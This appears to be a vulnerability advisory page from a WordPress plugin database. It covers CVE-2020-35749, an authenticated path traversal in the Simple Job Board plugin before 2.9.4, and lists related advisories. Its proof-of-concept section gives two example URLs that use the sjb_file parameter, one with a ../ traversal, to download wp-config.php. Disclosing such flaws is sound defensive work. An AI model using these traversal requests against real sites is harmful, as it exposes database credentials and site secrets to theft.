Lucene search
WpvulndbWPVDB-ID:EED3BD69-2FAF-4BC9-915C-C36211EF9E2DHistoryJan 15, 2021 - 12:00 a.m.
Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
2021-01-1500:00:00
wpscan.com
13
simple job board
plugin
authenticated
path traversal
arbitrary file download
hr users
web-server
path traversal attack
EPSS
0.123
Percentile
95.5%
The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack
PoC
The sjb_file parameter to use may depends on the configuration of the plugin, e.g: https://example.com/wp-admin/post.php?post=372&action;=edit&sjb;_file=var/www/wp-config.php https://example.com/wp-admin/post.php?post=372&action;=edit&sjb;_file=../../../../wp-config.php
Related
packetstorm
packetstorm
Simple JobBoard Authenticated File Read
2021-01-21 00:00:00
WordPress Simple Job Board 2.9.3 Local File Inclusion
2022-02-08 00:00:00
wpexploit
wpexploit
patchstack
patchstack
cvelist
cvelist
CVE-2020-35749
2021-01-15 16:51:10
exploitdb
exploitdb
Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
2022-02-08 00:00:00
nvd
nvd
CVE-2020-35749
2021-01-15 17:15:13
prion
prion
Directory traversal
2021-01-15 17:15:00
nuclei
nuclei
WordPress Simple Job Board <2.9.4 - Local File Inclusion
2022-02-08 01:07:19
zdt
zdt
Wordpress Simple Job Board 2.9.3 Plugin - Local File Inclusion Exploit
2022-02-08 00:00:00
cve
cve
CVE-2020-35749
2021-01-15 17:15:13